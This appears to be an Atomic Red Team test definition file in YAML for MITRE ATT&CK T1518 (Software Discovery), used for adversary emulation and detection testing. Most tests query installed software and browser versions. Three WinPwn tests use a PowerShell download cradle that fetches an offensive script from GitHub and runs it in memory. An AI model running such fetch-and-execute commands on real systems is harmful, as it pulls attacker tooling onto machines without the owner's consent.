Hare Sudhan
70 lines
3.3 KiB
YAML
70 lines
3.3 KiB
YAML
attack_technique: T1518
|
|
display_name: Software Discovery
|
|
atomic_tests:
|
|
- name: Find and Display Internet Explorer Browser Version
|
|
auto_generated_guid: 68981660-6670-47ee-a5fa-7e74806420a4
|
|
description: |
|
|
Query the registry to determine the version of internet explorer installed on the system.
|
|
Upon execution, version information about internet explorer will be displayed.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Internet Explorer" /v svcVersion
|
|
name: command_prompt
|
|
|
|
- name: Applications Installed
|
|
auto_generated_guid: c49978f6-bd6e-4221-ad2c-9e3e30cc1e3b
|
|
description: |
|
|
Query the registry to determine software and versions installed on the system. Upon execution a table of
|
|
software name and version information will be displayed.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |
|
|
Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize
|
|
Get-ItemProperty HKLM:\Software\Wow6432Node\Microsoft\Windows\CurrentVersion\Uninstall\* | Select-Object DisplayName, DisplayVersion, Publisher, InstallDate | Format-Table -Autosize
|
|
name: powershell
|
|
|
|
- name: Find and Display Safari Browser Version
|
|
auto_generated_guid: 103d6533-fd2a-4d08-976a-4a598565280f
|
|
description: |
|
|
Adversaries may attempt to get a listing of non-security related software that is installed on the system. Adversaries may use the information from Software Discovery during automated discovery to shape follow-on behaviors
|
|
supported_platforms:
|
|
- macos
|
|
executor:
|
|
name: sh
|
|
elevation_required: false
|
|
command: |
|
|
/usr/libexec/PlistBuddy -c "print :CFBundleShortVersionString" /Applications/Safari.app/Contents/Info.plist
|
|
/usr/libexec/PlistBuddy -c "print :CFBundleVersion" /Applications/Safari.app/Contents/Info.plist
|
|
- name: WinPwn - Dotnetsearch
|
|
auto_generated_guid: 7e79a1b6-519e-433c-ad55-3ff293667101
|
|
description: Search for any .NET binary file in a share using the Dotnetsearch function of WinPwn
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |-
|
|
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
|
Dotnetsearch -noninteractive -consoleoutput
|
|
name: powershell
|
|
- name: WinPwn - DotNet
|
|
auto_generated_guid: 10ba02d0-ab76-4f80-940d-451633f24c5b
|
|
description: Search for .NET Service-Binaries on this system via winpwn dotnet function of WinPwn.
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |-
|
|
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
|
dotnet -consoleoutput -noninteractive
|
|
name: powershell
|
|
- name: WinPwn - powerSQL
|
|
auto_generated_guid: 0bb64470-582a-4155-bde2-d6003a95ed34
|
|
description: Start PowerUpSQL Checks using powerSQL function of WinPwn
|
|
supported_platforms:
|
|
- windows
|
|
executor:
|
|
command: |-
|
|
iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/WinPwn/121dcee26a7aca368821563cbe92b2b5638c5773/WinPwn.ps1')
|
|
powerSQL -noninteractive -consoleoutput
|
|
name: powershell |